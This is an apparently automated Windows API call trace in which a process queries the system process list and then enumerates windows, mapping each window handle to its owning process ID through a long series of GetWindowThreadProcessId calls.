	[0941.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dcb0b8, Length=0x4c800, ResultLength=0x22e0e0 | out: SystemInformation=0x12dcb0b8, ResultLength=0x22e0e0*=0x4a050) returned 0x0
	[0941.729] EnumWindows (lpEnumFunc=0x23466ac, lParam=0x0) 
	[0941.730] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x558
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x538
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x778
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x778
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.731] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x460
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x2440
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x24d8
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1aa4
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1ff0
	[0941.732] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1a84
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1fb0
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1e10
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x23a8
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1f24
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x21ec
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x2320
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1fd4
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1880
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1b18
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1d6c
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x233c
	[0941.733] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x2368
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x2124
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x22f0
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x22ac
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1cdc
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x10f0
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1f18
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x20a8
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x2004
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1f88
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1f84
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x2050
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1e04
	[0941.734] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1ecc
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1e64
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1b58
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1e94
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1e28
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1df8
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1da8
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1c70
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x163c
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1a10
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x186c
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1d74
	[0941.735] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4c8
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1960
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1ce4
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1b24
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x14e0
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x17f0
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x854
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1268
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1624
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1b9c
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x16f4
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x145c
	[0941.736] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x17d0
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1d28
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xcb8
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1190
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x3a8
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1bd0
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1bfc
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1a78
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1b90
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1b04
	[0941.737] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1b34
	[0941.738] GetWindow (hWnd=0x108a0, uCmd=0x4) returned 0x0
	[0941.739] IsWindowVisible (hWnd=0x108a0) returned 0
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1b64
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1bb0
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1acc
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1a2c
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x19a8
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1944
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x18c8
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x18ac
	[0941.739] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x18ec
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1898
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc98
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x153c
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1808
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12a4
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1740
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x16c4
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1820
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x16ac
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1858
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1664
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x10b4
	[0941.740] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x10ac
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x10ec
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1068
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x17e0
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x102c
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x17a4
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1050
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1694
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1770
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1720
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x165c
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1578
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x16c0
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x161c
	[0941.741] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1638
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x15c8
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1554
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1674
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1520
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x14bc
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf8c
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe9c
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1434
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x14ec
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfcc
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12ac
	[0941.742] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1484
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x934
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc0c
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb08
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x948
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1178
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x13e0
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xcd0
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x13fc
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdc8
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc18
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc2c
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa1c
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1244
	[0941.743] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdb0
	[0941.744] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1398
	[0942.032] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1358
	[0942.032] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1370
	[0942.032] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1340
	[0942.032] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x130c
	[0942.032] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12c0
	[0942.032] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12e4
	[0942.032] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1270
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1298
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x120c
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x122c
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x11c4
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x11b0
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1188
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1148
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1160
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x10fc
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe34
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xea4
	[0942.033] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x514
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe48
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xbc8
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdf8
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x318
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xcac
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x8bc
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf9c
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf48
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe40
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xecc
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xeb8
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe80
	[0942.034] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe98
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe60
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xee4
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf00
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdf0
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe1c
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdd0
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd94
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd74
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd00
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xcd8
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc84
	[0942.035] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xca4
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc64
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc24
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb84
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xbac
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x384
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xab8
	[0942.036] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x33c
